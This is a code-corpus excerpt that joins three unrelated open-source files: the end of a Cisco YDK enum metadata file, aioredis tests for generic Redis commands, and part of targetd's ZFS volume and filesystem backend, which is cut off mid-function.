'tcp':'tcp',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'SecurityTypeValueEnum' : _MetaInfoEnum('SecurityTypeValueEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'security-type-none':'security_type_none',
'type':'type',
'ipsec':'ipsec',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
}
| apache-2.0 | 3,088,936,458,861,376,000 | 48.12963 | 197 | 0.636261 | false |
ymap/aioredis | tests/generic_commands_test.py | 1 | 23698 | import asyncio
import time
import math
import pytest
import sys
from unittest import mock
from aioredis import ReplyError
async def add(redis, key, value):
ok = await redis.connection.execute('set', key, value)
assert ok == b'OK'
@pytest.mark.run_loop
async def test_delete(redis):
await add(redis, 'my-key', 123)
await add(redis, 'other-key', 123)
res = await redis.delete('my-key', 'non-existent-key')
assert res == 1
res = await redis.delete('other-key', 'other-key')
assert res == 1
with pytest.raises(TypeError):
await redis.delete(None)
with pytest.raises(TypeError):
await redis.delete('my-key', 'my-key', None)
@pytest.mark.run_loop
async def test_dump(redis):
await add(redis, 'my-key', 123)
data = await redis.dump('my-key')
assert data == mock.ANY
assert isinstance(data, (bytes, bytearray))
assert len(data) > 0
data = await redis.dump('non-existent-key')
assert data is None
with pytest.raises(TypeError):
await redis.dump(None)
@pytest.mark.run_loop
async def test_exists(redis, server):
await add(redis, 'my-key', 123)
res = await redis.exists('my-key')
assert isinstance(res, int)
assert res == 1
res = await redis.exists('non-existent-key')
assert isinstance(res, int)
assert res == 0
with pytest.raises(TypeError):
await redis.exists(None)
if server.version < (3, 0, 3):
with pytest.raises(ReplyError):
await redis.exists('key-1', 'key-2')
@pytest.redis_version(
3, 0, 3, reason='Multi-key EXISTS available since redis>=2.8.0')
@pytest.mark.run_loop
async def test_exists_multiple(redis):
await add(redis, 'my-key', 123)
res = await redis.exists('my-key', 'other-key')
assert isinstance(res, int)
assert res == 1
res = await redis.exists('my-key', 'my-key')
assert isinstance(res, int)
assert res == 2
res = await redis.exists('foo', 'bar')
assert isinstance(res, int)
assert res == 0
@pytest.mark.run_loop
async def test_expire(redis):
await add(redis, 'my-key', 132)
res = await redis.expire('my-key', 10)
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res >= 10
await redis.expire('my-key', -1)
res = await redis.exists('my-key')
assert not res
res = await redis.expire('other-key', 1000)
assert res is False
await add(redis, 'my-key', 1)
res = await redis.expire('my-key', 10.0)
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res >= 10
with pytest.raises(TypeError):
await redis.expire(None, 123)
with pytest.raises(TypeError):
await redis.expire('my-key', 'timeout')
@pytest.mark.run_loop
async def test_expireat(redis):
await add(redis, 'my-key', 123)
now = math.ceil(time.time())
fut1 = redis.expireat('my-key', now + 10)
fut2 = redis.connection.execute('TTL', 'my-key')
assert (await fut1) is True
assert (await fut2) >= 10
now = time.time()
fut1 = redis.expireat('my-key', now + 10)
fut2 = redis.connection.execute('TTL', 'my-key')
assert (await fut1) is True
assert (await fut2) >= 10
res = await redis.expireat('my-key', -1)
assert res is True
res = await redis.exists('my-key')
assert not res
await add(redis, 'my-key', 123)
res = await redis.expireat('my-key', 0)
assert res is True
res = await redis.exists('my-key')
assert not res
await add(redis, 'my-key', 123)
with pytest.raises(TypeError):
await redis.expireat(None, 123)
with pytest.raises(TypeError):
await redis.expireat('my-key', 'timestamp')
@pytest.mark.run_loop
async def test_keys(redis):
res = await redis.keys('*pattern*')
assert res == []
await redis.connection.execute('FLUSHDB')
res = await redis.keys('*')
assert res == []
await add(redis, 'my-key-1', 1)
await add(redis, 'my-key-ab', 1)
res = await redis.keys('my-key-?')
assert res == [b'my-key-1']
res = await redis.keys('my-key-*')
assert sorted(res) == [b'my-key-1', b'my-key-ab']
# test with encoding param
res = await redis.keys('my-key-*', encoding='utf-8')
assert sorted(res) == ['my-key-1', 'my-key-ab']
with pytest.raises(TypeError):
await redis.keys(None)
@pytest.mark.run_loop
async def test_migrate(create_redis, loop, server, serverB):
redisA = await create_redis(server.tcp_address)
redisB = await create_redis(serverB.tcp_address, db=2)
await add(redisA, 'my-key', 123)
await redisB.delete('my-key')
assert (await redisA.exists('my-key'))
assert not (await redisB.exists('my-key'))
ok = await redisA.migrate(
'localhost', serverB.tcp_address.port, 'my-key', 2, 1000)
assert ok is True
assert not (await redisA.exists('my-key'))
assert (await redisB.exists('my-key'))
with pytest.raises(TypeError, match="host .* str"):
await redisA.migrate(None, 1234, 'key', 1, 23)
with pytest.raises(TypeError, match="args .* None"):
await redisA.migrate('host', '1234', None, 1, 123)
with pytest.raises(TypeError, match="dest_db .* int"):
await redisA.migrate('host', 123, 'key', 1.0, 123)
with pytest.raises(TypeError, match="timeout .* int"):
await redisA.migrate('host', '1234', 'key', 2, None)
with pytest.raises(ValueError, match="Got empty host"):
await redisA.migrate('', '123', 'key', 1, 123)
with pytest.raises(ValueError, match="dest_db .* greater equal 0"):
await redisA.migrate('host', 6379, 'key', -1, 1000)
with pytest.raises(ValueError, match="timeout .* greater equal 0"):
await redisA.migrate('host', 6379, 'key', 1, -1000)
@pytest.redis_version(
3, 0, 0, reason="Copy/Replace flags available since Redis 3.0")
@pytest.mark.run_loop
async def test_migrate_copy_replace(create_redis, loop, server, serverB):
redisA = await create_redis(server.tcp_address)
redisB = await create_redis(serverB.tcp_address, db=0)
await add(redisA, 'my-key', 123)
await redisB.delete('my-key')
ok = await redisA.migrate(
'localhost', serverB.tcp_address.port, 'my-key', 0, 1000, copy=True)
assert ok is True
assert (await redisA.get('my-key')) == b'123'
assert (await redisB.get('my-key')) == b'123'
assert (await redisA.set('my-key', 'val'))
ok = await redisA.migrate(
'localhost', serverB.tcp_address.port, 'my-key', 2, 1000, replace=True)
assert (await redisA.get('my-key')) is None
assert (await redisB.get('my-key'))
@pytest.redis_version(
3, 0, 6, reason="MIGRATE…KEYS available since Redis 3.0.6")
@pytest.mark.skipif(
sys.platform == 'win32', reason="Seems to be unavailable in win32 build")
@pytest.mark.run_loop
async def test_migrate_keys(create_redis, loop, server, serverB):
redisA = await create_redis(server.tcp_address)
redisB = await create_redis(serverB.tcp_address, db=0)
await add(redisA, 'key1', 123)
await add(redisA, 'key2', 123)
await add(redisA, 'key3', 123)
await redisB.delete('key1', 'key2', 'key3')
ok = await redisA.migrate_keys(
'localhost', serverB.tcp_address.port,
('key1', 'key2', 'key3', 'non-existing-key'),
dest_db=0, timeout=1000)
assert ok is True
assert (await redisB.get('key1')) == b'123'
assert (await redisB.get('key2')) == b'123'
assert (await redisB.get('key3')) == b'123'
assert (await redisA.get('key1')) is None
assert (await redisA.get('key2')) is None
assert (await redisA.get('key3')) is None
ok = await redisA.migrate_keys(
'localhost', serverB.tcp_address.port, ('key1', 'key2', 'key3'),
dest_db=0, timeout=1000)
assert not ok
ok = await redisB.migrate_keys(
'localhost', server.tcp_address.port, ('key1', 'key2', 'key3'),
dest_db=0, timeout=1000,
copy=True)
assert ok
assert (await redisB.get('key1')) == b'123'
assert (await redisB.get('key2')) == b'123'
assert (await redisB.get('key3')) == b'123'
assert (await redisA.get('key1')) == b'123'
assert (await redisA.get('key2')) == b'123'
assert (await redisA.get('key3')) == b'123'
assert (await redisA.set('key1', 'val'))
assert (await redisA.set('key2', 'val'))
assert (await redisA.set('key3', 'val'))
ok = await redisA.migrate_keys(
'localhost', serverB.tcp_address.port,
('key1', 'key2', 'key3', 'non-existing-key'),
dest_db=0, timeout=1000, replace=True)
assert ok is True
assert (await redisB.get('key1')) == b'val'
assert (await redisB.get('key2')) == b'val'
assert (await redisB.get('key3')) == b'val'
assert (await redisA.get('key1')) is None
assert (await redisA.get('key2')) is None
assert (await redisA.get('key3')) is None
@pytest.mark.run_loop
async def test_migrate__exceptions(redis, loop, server, unused_port):
await add(redis, 'my-key', 123)
assert (await redis.exists('my-key'))
with pytest.raises(ReplyError, match="IOERR .* timeout .*"):
assert not (await redis.migrate(
'localhost', unused_port(),
'my-key', dest_db=30, timeout=10))
@pytest.redis_version(
3, 0, 6, reason="MIGRATE…KEYS available since Redis 3.0.6")
@pytest.mark.skipif(
sys.platform == 'win32', reason="Seems to be unavailable in win32 build")
@pytest.mark.run_loop
async def test_migrate_keys__errors(redis):
with pytest.raises(TypeError, match="host .* str"):
await redis.migrate_keys(None, 1234, 'key', 1, 23)
with pytest.raises(TypeError, match="keys .* list or tuple"):
await redis.migrate_keys('host', '1234', None, 1, 123)
with pytest.raises(TypeError, match="dest_db .* int"):
await redis.migrate_keys('host', 123, ('key',), 1.0, 123)
with pytest.raises(TypeError, match="timeout .* int"):
await redis.migrate_keys('host', '1234', ('key',), 2, None)
with pytest.raises(ValueError, match="Got empty host"):
await redis.migrate_keys('', '123', ('key',), 1, 123)
with pytest.raises(ValueError, match="dest_db .* greater equal 0"):
await redis.migrate_keys('host', 6379, ('key',), -1, 1000)
with pytest.raises(ValueError, match="timeout .* greater equal 0"):
await redis.migrate_keys('host', 6379, ('key',), 1, -1000)
with pytest.raises(ValueError, match="keys .* empty"):
await redis.migrate_keys('host', '1234', (), 2, 123)
@pytest.mark.run_loop
async def test_move(redis):
await add(redis, 'my-key', 123)
assert redis.db == 0
res = await redis.move('my-key', 1)
assert res is True
with pytest.raises(TypeError):
await redis.move(None, 1)
with pytest.raises(TypeError):
await redis.move('my-key', None)
with pytest.raises(ValueError):
await redis.move('my-key', -1)
with pytest.raises(TypeError):
await redis.move('my-key', 'not db')
@pytest.mark.run_loop
async def test_object_refcount(redis):
await add(redis, 'foo', 'bar')
res = await redis.object_refcount('foo')
assert res == 1
res = await redis.object_refcount('non-existent-key')
assert res is None
with pytest.raises(TypeError):
await redis.object_refcount(None)
@pytest.mark.run_loop
async def test_object_encoding(redis, server):
await add(redis, 'foo', 'bar')
res = await redis.object_encoding('foo')
if server.version < (3, 0, 0):
assert res == b'raw'
else:
assert res == b'embstr'
res = await redis.incr('key')
assert res == 1
res = await redis.object_encoding('key')
assert res == b'int'
res = await redis.object_encoding('non-existent-key')
assert res is None
with pytest.raises(TypeError):
await redis.object_encoding(None)
@pytest.mark.run_loop(timeout=20)
async def test_object_idletime(redis, loop, server):
await add(redis, 'foo', 'bar')
res = await redis.object_idletime('foo')
# NOTE: sometimes travis-ci is too slow
assert res >= 0
res = 0
while not res:
res = await redis.object_idletime('foo')
await asyncio.sleep(.5, loop=loop)
assert res >= 1
res = await redis.object_idletime('non-existent-key')
assert res is None
with pytest.raises(TypeError):
await redis.object_idletime(None)
@pytest.mark.run_loop
async def test_persist(redis):
await add(redis, 'my-key', 123)
res = await redis.expire('my-key', 10)
assert res is True
res = await redis.persist('my-key')
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res == -1
with pytest.raises(TypeError):
await redis.persist(None)
@pytest.mark.run_loop
async def test_pexpire(redis, loop):
await add(redis, 'my-key', 123)
res = await redis.pexpire('my-key', 100)
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res == 0
res = await redis.connection.execute('PTTL', 'my-key')
assert res > 0
await add(redis, 'my-key', 123)
res = await redis.pexpire('my-key', 1)
assert res is True
# XXX: tests now looks strange to me.
await asyncio.sleep(.2, loop=loop)
res = await redis.exists('my-key')
assert not res
with pytest.raises(TypeError):
await redis.pexpire(None, 0)
with pytest.raises(TypeError):
await redis.pexpire('my-key', 1.0)
@pytest.mark.run_loop
async def test_pexpireat(redis):
await add(redis, 'my-key', 123)
now = math.ceil((await redis.time()) * 1000)
fut1 = redis.pexpireat('my-key', now + 2000)
fut2 = redis.ttl('my-key')
fut3 = redis.pttl('my-key')
assert (await fut1) is True
assert (await fut2) == 2
pytest.assert_almost_equal((await fut3), 2000, -3)
with pytest.raises(TypeError):
await redis.pexpireat(None, 1234)
with pytest.raises(TypeError):
await redis.pexpireat('key', 'timestamp')
with pytest.raises(TypeError):
await redis.pexpireat('key', 1000.0)
@pytest.mark.run_loop
async def test_pttl(redis, server):
await add(redis, 'key', 'val')
res = await redis.pttl('key')
assert res == -1
res = await redis.pttl('non-existent-key')
if server.version < (2, 8, 0):
assert res == -1
else:
assert res == -2
await redis.pexpire('key', 500)
res = await redis.pttl('key')
pytest.assert_almost_equal(res, 500, -2)
with pytest.raises(TypeError):
await redis.pttl(None)
@pytest.mark.run_loop
async def test_randomkey(redis):
await add(redis, 'key:1', 123)
await add(redis, 'key:2', 123)
await add(redis, 'key:3', 123)
res = await redis.randomkey()
assert res in [b'key:1', b'key:2', b'key:3']
# test with encoding param
res = await redis.randomkey(encoding='utf-8')
assert res in ['key:1', 'key:2', 'key:3']
await redis.connection.execute('flushdb')
res = await redis.randomkey()
assert res is None
@pytest.mark.run_loop
async def test_rename(redis, server):
await add(redis, 'foo', 'bar')
await redis.delete('bar')
res = await redis.rename('foo', 'bar')
assert res is True
with pytest.raises(ReplyError, match='ERR no such key'):
await redis.rename('foo', 'bar')
with pytest.raises(TypeError):
await redis.rename(None, 'bar')
with pytest.raises(TypeError):
await redis.rename('foo', None)
with pytest.raises(ValueError):
await redis.rename('foo', 'foo')
if server.version < (3, 2):
with pytest.raises(ReplyError, match='.* objects are the same'):
await redis.rename('bar', b'bar')
@pytest.mark.run_loop
async def test_renamenx(redis, server):
await redis.delete('foo', 'bar')
await add(redis, 'foo', 123)
res = await redis.renamenx('foo', 'bar')
assert res is True
await add(redis, 'foo', 123)
res = await redis.renamenx('foo', 'bar')
assert res is False
with pytest.raises(ReplyError, match='ERR no such key'):
await redis.renamenx('baz', 'foo')
with pytest.raises(TypeError):
await redis.renamenx(None, 'foo')
with pytest.raises(TypeError):
await redis.renamenx('foo', None)
with pytest.raises(ValueError):
await redis.renamenx('foo', 'foo')
if server.version < (3, 2):
with pytest.raises(ReplyError, match='.* objects are the same'):
await redis.renamenx('foo', b'foo')
@pytest.mark.run_loop
async def test_restore(redis):
ok = await redis.set('key', 'value')
assert ok
dump = await redis.dump('key')
assert dump is not None
ok = await redis.delete('key')
assert ok
assert b'OK' == (await redis.restore('key', 0, dump))
assert (await redis.get('key')) == b'value'
@pytest.redis_version(2, 8, 0, reason='SCAN is available since redis>=2.8.0')
@pytest.mark.run_loop
async def test_scan(redis):
for i in range(1, 11):
foo_or_bar = 'bar' if i % 3 else 'foo'
key = 'key:scan:{}:{}'.format(foo_or_bar, i).encode('utf-8')
await add(redis, key, i)
cursor, values = await redis.scan()
# values should be *>=* just in case some other tests left
# test keys
assert len(values) >= 10
cursor, test_values = b'0', []
while cursor:
cursor, values = await redis.scan(
cursor=cursor, match=b'key:scan:foo*')
test_values.extend(values)
assert len(test_values) == 3
cursor, test_values = b'0', []
while cursor:
cursor, values = await redis.scan(
cursor=cursor, match=b'key:scan:bar:*')
test_values.extend(values)
assert len(test_values) == 7
# SCAN family functions do not guarantee that the number of
# elements returned per call are in a given range. So here
# just dummy test, that *count* argument does not break something
cursor = b'0'
test_values = []
while cursor:
cursor, values = await redis.scan(cursor=cursor,
match=b'key:scan:*',
count=2)
test_values.extend(values)
assert len(test_values) == 10
@pytest.mark.run_loop
async def test_sort(redis):
async def _make_list(key, items):
await redis.delete(key)
for i in items:
await redis.rpush(key, i)
await _make_list('a', '4231')
res = await redis.sort('a')
assert res == [b'1', b'2', b'3', b'4']
res = await redis.sort('a', offset=2, count=2)
assert res == [b'3', b'4']
res = await redis.sort('a', asc=b'DESC')
assert res == [b'4', b'3', b'2', b'1']
await _make_list('a', 'dbca')
res = await redis.sort(
'a', asc=b'DESC', alpha=True, offset=2, count=2
)
assert res == [b'b', b'a']
await redis.set('key:1', 10)
await redis.set('key:2', 4)
await redis.set('key:3', 7)
await _make_list('a', '321')
res = await redis.sort('a', by='key:*')
assert res == [b'2', b'3', b'1']
res = await redis.sort('a', by='nosort')
assert res == [b'3', b'2', b'1']
res = await redis.sort('a', by='key:*', store='sorted_a')
assert res == 3
res = await redis.lrange('sorted_a', 0, -1)
assert res == [b'2', b'3', b'1']
await redis.set('value:1', 20)
await redis.set('value:2', 30)
await redis.set('value:3', 40)
res = await redis.sort('a', 'value:*', by='key:*')
assert res == [b'30', b'40', b'20']
await redis.hset('data_1', 'weight', 30)
await redis.hset('data_2', 'weight', 20)
await redis.hset('data_3', 'weight', 10)
await redis.hset('hash_1', 'field', 20)
await redis.hset('hash_2', 'field', 30)
await redis.hset('hash_3', 'field', 10)
res = await redis.sort(
'a', 'hash_*->field', by='data_*->weight'
)
assert res == [b'10', b'30', b'20']
@pytest.redis_version(3, 2, 1, reason="TOUCH is available since redis>=3.2.1")
@pytest.mark.run_loop(timeout=20)
async def test_touch(redis, loop):
await add(redis, 'key', 'val')
res = 0
while not res:
res = await redis.object_idletime('key')
await asyncio.sleep(.5, loop=loop)
assert res > 0
assert await redis.touch('key', 'key', 'key') == 3
res2 = await redis.object_idletime('key')
assert 0 <= res2 < res
@pytest.mark.run_loop
async def test_ttl(redis, server):
await add(redis, 'key', 'val')
res = await redis.ttl('key')
assert res == -1
res = await redis.ttl('non-existent-key')
if server.version < (2, 8, 0):
assert res == -1
else:
assert res == -2
await redis.expire('key', 10)
res = await redis.ttl('key')
assert res >= 9
with pytest.raises(TypeError):
await redis.ttl(None)
@pytest.mark.run_loop
async def test_type(redis):
await add(redis, 'key', 'val')
res = await redis.type('key')
assert res == b'string'
await redis.delete('key')
await redis.incr('key')
res = await redis.type('key')
assert res == b'string'
await redis.delete('key')
await redis.sadd('key', 'val')
res = await redis.type('key')
assert res == b'set'
res = await redis.type('non-existent-key')
assert res == b'none'
with pytest.raises(TypeError):
await redis.type(None)
@pytest.redis_version(2, 8, 0, reason='SCAN is available since redis>=2.8.0')
@pytest.mark.run_loop
async def test_iscan(redis):
full = set()
foo = set()
bar = set()
for i in range(1, 11):
is_bar = i % 3
foo_or_bar = 'bar' if is_bar else 'foo'
key = 'key:scan:{}:{}'.format(foo_or_bar, i).encode('utf-8')
full.add(key)
if is_bar:
bar.add(key)
else:
foo.add(key)
assert await redis.set(key, i) is True
async def coro(cmd):
lst = []
async for i in cmd:
lst.append(i)
return lst
ret = await coro(redis.iscan())
assert len(ret) >= 10
ret = await coro(redis.iscan(match='key:scan:*'))
assert 10 == len(ret)
assert set(ret) == full
ret = await coro(redis.iscan(match='key:scan:foo*'))
assert set(ret) == foo
ret = await coro(redis.iscan(match='key:scan:bar*'))
assert set(ret) == bar
# SCAN family functions do not guarantee that the number of
# elements returned per call are in a given range. So here
# just dummy test, that *count* argument does not break something
ret = await coro(redis.iscan(match='key:scan:*', count=2))
assert 10 == len(ret)
assert set(ret) == full
@pytest.redis_version(4, 0, 0, reason="UNLINK is available since redis>=4.0.0")
@pytest.mark.run_loop
async def test_unlink(redis):
await add(redis, 'my-key', 123)
await add(redis, 'other-key', 123)
res = await redis.unlink('my-key', 'non-existent-key')
assert res == 1
res = await redis.unlink('other-key', 'other-key')
assert res == 1
with pytest.raises(TypeError):
await redis.unlink(None)
with pytest.raises(TypeError):
await redis.unlink('my-key', 'my-key', None)
@pytest.redis_version(3, 0, 0, reason="WAIT is available since redis>=3.0.0")
@pytest.mark.run_loop
async def test_wait(redis, loop):
await add(redis, 'key', 'val1')
start = await redis.time()
res = await redis.wait(1, 400)
end = await redis.time()
assert res == 0
assert end - start >= .4
await add(redis, 'key', 'val2')
start = await redis.time()
res = await redis.wait(0, 400)
end = await redis.time()
assert res == 0
assert end - start < .4
| mit | -5,231,168,237,388,924,000 | 28.691729 | 79 | 0.614755 | false |
open-iscsi/targetd | targetd/backends/zfs.py | 1 | 16228 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2012-2013, Andy Grover <[email protected]>
#
# Routines specific to ZFS to export zvols over iscsi
import distutils.spawn
import logging
import re
import subprocess
from time import time, sleep
from targetd.main import TargetdError
pools = []
pools_fs = dict()
zfs_cmd = ""
zfs_enable_copy = False
ALLOWED_DATASET_NAMES = re.compile("^[A-Za-z0-9][A-Za-z0-9_.\-]*$")
class VolInfo(object):
"""
Just to have attributes compatible with LVM info.
"""
uuid = ""
size = 0
def __init__(self, uuid, size):
self.uuid = uuid
self.size = size
def has_pool(pool_name):
"""
This can be used to check if module owns given pool without raising
exception
"""
return pool_name in pools
def has_fs_pool(pool_name):
"""
This can be used to check if module owns given fs_pool without raising
exception
"""
return pool_name in pools_fs
def has_udev_path(udev_path):
try:
pool, dataset = split_udev_path(udev_path)
except (IndexError, ValueError, TypeError):
return False
return True
def split_udev_path(udev_path):
dataset = udev_path.split("/", 2)[2]
for p in pools:
if dataset.startswith(p + "/"):
return p, dataset.replace(p + "/", "", 1)
def pool2dev_name(pool):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return pool
def dev2pool_name(dev):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return dev
def get_so_name(pool, volname):
"""
Using % here, because it's not allowed in zfs dataset names and
/ is not allowed in target's storage object names
"""
return "%s:%s" % (pool.replace("/", "%"), volname)
def so_name2pool_volume(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return pool_name, vol_name
def has_so_name(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return has_pool(pool_name)
def get_dev_path(pool_name, vol_name):
return "/dev/%s/%s" % (pool2dev_name(pool_name), vol_name)
def initialize(config_dict, init_pools):
global pools
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
check_pools_access(init_pools)
pools = init_pools
def fs_initialize(config_dict, init_pools):
global pools_fs
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
pools_fs = {fs["mount"]: fs["device"] for fs in init_pools}
check_pools_access(list(pools_fs.values()))
def _check_dataset_name(name):
if not ALLOWED_DATASET_NAMES.match(name):
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Invalid dataset name, can only contain alphanumeric characters,"
"underscores, dots and hyphens",
)
def _zfs_find_cmd():
cmd = distutils.spawn.find_executable("zfs") or distutils.spawn.find_executable(
"zfs", "/sbin:/usr/sbin"
)
if cmd is None or not cmd:
raise TargetdError(
TargetdError.INVALID, "zfs_block_pools is set but no zfs command was found"
)
global zfs_cmd
zfs_cmd = cmd
def _zfs_exec_command(args=None):
if args is None:
args = []
for _ in range(3):
proc = subprocess.Popen(
[zfs_cmd] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(out, err) = proc.communicate()
if proc.returncode != 0:
logging.debug(
"zfs command returned non-zero status: %s, %s. Stderr: %s. Stdout: %s"
% (proc.returncode, args, out, err)
)
# See: https://github.com/openzfs/zfs/issues/1810
if b"dataset is busy" in err:
sleep(1)
logging.debug("Retrying on 'dataset is busy' error ...")
continue
else:
return proc.returncode, out, err
else:
return proc.returncode, out, err
def _zfs_get(datasets, properties, recursive=False, fstype="all"):
result = {}
flags = "-Hp"
if recursive:
flags = "-Hpr"
code, out, err = _zfs_exec_command(
["get", flags, "-t", fstype, ",".join(properties)] + datasets
)
for line in out.strip().split(b"\n"):
fields = str(line, encoding="utf-8").strip().split("\t")
if len(fields) < 2:
continue
if fields[0] in result:
result[fields[0]][fields[1]] = fields[2].strip()
else:
result[fields[0]] = {fields[1]: fields[2].strip()}
return result
def check_pools_access(check_pools):
if any([s.startswith(i + "/") for s in check_pools for i in check_pools]):
raise TargetdError(
TargetdError.INVALID,
"ZFS pools cannot contain both parent and child datasets",
)
if any(":" in p for p in check_pools):
raise TargetdError(TargetdError.INVALID, "Colon in ZFS pools is not supported")
if len(check_pools) == 0:
logging.debug("No ZFS pool defined, skipping ZFS")
return
_zfs_find_cmd()
props = _zfs_get(check_pools, ["type", "name"])
for p in check_pools:
if p not in props or "type" not in props[p]:
raise TargetdError(
TargetdError.INVALID, "ZFS dataset does not exist: %s" % (p,)
)
if props[p]["type"] != "filesystem":
raise TargetdError(
TargetdError.INVALID,
"ZFS dataset must be of 'filesystem' type. %s is %s"
% (p, props[p]["type"]),
)
def block_pools(req):
if not zfs_cmd:
return []
results = []
props = _zfs_get(pools, ["available", "used", "guid"])
for pool in pools:
results.append(
dict(
name=pool,
size=int(props[pool]["available"]) + int(props[pool]["used"]),
free_size=int(props[pool]["available"]),
type="block",
uuid=int(props[pool]["guid"]),
)
)
return results
def volumes(req, pool):
if not zfs_cmd:
return []
allprops = _zfs_get([pool], ["volsize", "guid"], True, "volume")
results = []
for fullname, props in allprops.items():
results.append(
dict(
name=fullname.replace(pool + "/", "", 1),
size=int(props["volsize"]),
uuid=props["guid"],
)
)
return results
def fs_hash():
if not zfs_cmd:
return {}
fs_list = {}
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool],
["name", "mountpoint", "guid", "used", "available"],
True,
"filesystem",
)
for fullname, props in allprops.items():
if fullname == zfs_pool:
continue
sub_vol = fullname.replace(zfs_pool + "/", "", 1)
key = props["name"]
fs_list[key] = dict(
name=sub_vol,
uuid=props["guid"],
total_space=int(props["used"]) + int(props["available"]),
free_space=int(props["available"]),
pool=pool,
full_path=props["mountpoint"],
)
return fs_list
def vol_info(pool, name):
props = _zfs_get([pool + "/" + name], ["guid", "volsize"], fstype="volume")
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["volsize"]))
def fs_info(pool, name):
props = _zfs_get(
[pool + "/" + name], ["guid", "used", "available"], fstype="filesystem"
)
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["available"]) + int(props["used"]))
def snap_info(pool, name, snapshot):
props = _zfs_get([pool + "/" + name + "@" + snapshot], ["guid"], fstype="snapshot")
if (pool + "/" + name + "@" + snapshot) in props:
props = props[pool + "/" + name + "@" + snapshot]
return dict(name=pool + "/" + name + "@" + snapshot, uuid=props["guid"])
def create(req, pool, name, size):
_check_dataset_name(name)
code, out, err = _zfs_exec_command(["create", "-V", str(size), pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def fs_create(req, pool, name, size):
_check_dataset_name(name)
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, name) is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME, "FS already exists with that name (ZFS)"
)
code, out, err = _zfs_exec_command(["create", zfs_pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def destroy(req, pool, name):
_check_dataset_name(name)
# -r will destroy snapshots and children but not dependant clones
code, out, err = _zfs_exec_command(["destroy", "-r", pool + "/" + name])
if code != 0:
if b"volume has dependent clones" in err:
logging.error(
"Volume %s on %s has dependent clones and cannot be destroyed. Stderr: %s"
% (name, pool, err)
)
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Volume %s on %s has dependent clones and cannot be destroyed."
% (name, pool),
)
else:
logging.error(
"Could not destroy volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not destroy volume %s on pool %s" % (name, pool),
)
def fs_destroy(req, pool, name):
zfs_pool = pools_fs[pool]
destroy(req, zfs_pool, name)
def copy(req, pool, vol_orig, vol_new, size, timeout=10):
_copy(req, pool, vol_orig, vol_new, size, vol_info)
def _copy(req, pool, vol_orig, vol_new, size, info_fn, snap=None):
if not zfs_enable_copy:
raise TargetdError(
TargetdError.NO_SUPPORT,
"Copy on ZFS disabled. Consult manual before enabling it.",
)
_check_dataset_name(vol_orig)
_check_dataset_name(vol_new)
if info_fn(pool, vol_new) is not None:
raise TargetdError(
TargetdError.NAME_CONFLICT,
"Destination volume %s already exists on pool %s" % (vol_new, pool),
)
if snap is None:
snap = vol_new + str(int(time()))
code, out, err = _zfs_exec_command(
["snapshot", "%s/%s@%s" % (pool, vol_orig, snap)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create snapshot of %s on pool %s" % (vol_orig, pool),
)
args = ["clone"]
if size is not None:
args.extend(["-o", "volsize=%d" % size])
args.extend(["%s/%s@%s" % (pool, vol_orig, snap), "%s/%s" % (pool, vol_new)])
code, out, err = _zfs_exec_command(args)
if code != 0:
# try cleaning up the snapshot if cloning goes wrong
_zfs_exec_command(["destroy", "%s/%s@%s" % (pool, vol_orig, snap)])
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create clone of %s@%s on pool %s" % (vol_orig, snap, pool),
)
def resize(req, pool, name, size):
args = ["set", "volsize=%d" % size, "%s/%s" % (pool, name)]
code, out, err = _zfs_exec_command(args)
if code != 0:
raise TargetdError(TargetdError.UNEXPECTED_EXIT_CODE, "Failed to resize volume")
def ss(req, pool, name):
snapshots = []
zfs_pool = pools_fs[pool]
# NOTE: Recursive is set to True as the ZFS version on Ubuntu in Travis does not appreciate getting snapshots
# by passing in a non-snapshot name. Somewhere between version 0.7.5 and 0.8.4 this got fixed
allprops = _zfs_get(
